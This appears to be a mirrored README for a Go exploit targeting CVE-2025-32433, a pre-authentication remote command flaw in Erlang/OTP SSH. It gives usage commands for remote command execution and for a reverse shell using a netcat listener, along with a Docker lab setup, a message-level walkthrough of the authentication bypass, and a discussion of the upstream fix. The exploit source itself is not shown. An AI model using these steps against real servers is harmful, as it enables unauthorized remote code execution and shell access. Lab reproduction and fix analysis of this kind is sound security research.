关联漏洞
描述
Go-based exploit for CVE-2025-32433
介绍
# CVE-2025-32433 Remote Shell
Go-based exploit for CVE-2025-32433 returning a remote bash shell.
Heavily inspired by understanding of exploit derived from [ProDefense's PoC for CVE-2025-32433](https://github.com/ProDefense/CVE-2025-32433).
## Running the Exploit
```
make
```
> `exploit.exe` is also made available for Windows machines by the cross-compilation Makefile.
then execute the exploit binary in one of 2 ways:
**Command**
```
./exploit <target-ip> <target-port> "<command>"
```
> NOTE: does not return the output of command
**Reverse Shell**
```
nc -lnvp <attacker-port>
```
```
./exploit <target-ip> <target-port> <attacker-ip> <attacker-port>
```
## Setting Up the Environment
Using `ProDefense`'s Dockerfile, you can set up an environment through the following:
```
docker build -t "cve-2025-32433:Dockerfile" .
```
```
docker run -p 2222:2222 cve-2025-32433:Dockerfile
```
You may then execute the exploit as in the [Running the Exploit](#running-the-exploit) section: e.g.
```
nc -lnvp 4444
```
```
./exploit 127.0.0.1 2222 172.17.0.1 4444
```
> `172.17.0.1` is the default IP for the Docker Host
## Explanation of Exploit
> TL;DR **"The issue is caused by a flaw in the SSH protocol message handling which allows an attacker to send connection protocol messages prior to authentication,"**
Typical SSH Procedure:
```
SSH_MSG_KEXINIT
→ SSH_MSG_KEXDH_INIT / KEX_ECDH_INIT (key exchange)
→ SSH_MSG_NEWKEYS
→ SSH_MSG_SERVICE_REQUEST ("ssh-userauth")
→ SSH_MSG_USERAUTH_REQUEST
→ SSH_MSG_USERAUTH_SUCCESS
→ SSH_MSG_CHANNEL_OPEN
→ SSH_MSG_CHANNEL_REQUEST
```
Exploit Procedure:
1. TCP Connection to Victim
2. SSH Banner Exchange
3. `SSH_MSG_KEXINIT`
4. `SSH_MSG_CHANNEL_OPEN` (Pre-auth)
5. `SSH_MSG_CHANNEL_REQUEST` (Pre-auth) --> contains command payload
> Notice that the entire USERAUTH portion is skipped in the exploit.
### Summary of Messages
Relevant RFCs for SSH Messages:
* [`RFC 4253: The Secure Shell (SSH) Transport Layer Protocol`](https://datatracker.ietf.org/doc/html/rfc4253)
* [`RFC 4254: The Secure Shell (SSH) Connection Protocol`](https://datatracker.ietf.org/doc/html/rfc4254)
#### Message Numbers
#### Message Formats
SSH_MSG_KEXINIT
SSH_MSG_CHANNEL_OPEN
SSH_MSG_CHANNEL_REQUEST
### Other Requirements
String Format (from [`RFC 4251: The Secure Shell (SSH) Protocol Architecture`](https://datatracker.ietf.org/doc/html/rfc4251))
Padding
### Understanding Fix and Exploit
The following is the fix introduced to the [Erlang OTP Libraries](https://github.com/erlang/otp) in the [`ssh: early RCE fix` commit](https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891):
The fix introduces a new `handle_msg` clause that, according to its arguments, catches:
* `Msg`: catch-all variable for any incoming SSH messages not already matched by earlier clauses (like `#ssh_msg_disconnect{}`)
* `#ssh{authenticated = false}`: session state that matches if the connection has not yet been authenticated.
The clause will not catch sessions with `authenticated = true`, which is attached to the session when the server receives a `#ssh_msg_userauth_success{}`:
which is sent after the success of any of the following authentication methods:
文件快照
[4.0K] /data/pocs/cea47545cfd5ba969e0524b747026cdd7fc8fc5a
├── [6.6K] exploit.go
├── [4.0K] images
│ ├── [ 29K] authenticated_set_true.png
│ ├── [ 61K] connection_protocol_message_numbers.png
│ ├── [103K] handle_msg.png
│ ├── [ 98K] padding.png
│ ├── [ 44K] SSH_MSG_CHANNEL_OPEN_format.png
│ ├── [ 44K] SSH_MSG_CHANNEL_REQUEST_format.png
│ ├── [ 70K] SSH_MSG_KEXINIT_format.png
│ ├── [255K] ssh_msg_userauth_success.png
│ ├── [ 69K] string_format.png
│ └── [ 33K] transport_layer_protocol_message_numbers.png
├── [ 466] Makefile
└── [3.8K] README.md
1 directory, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。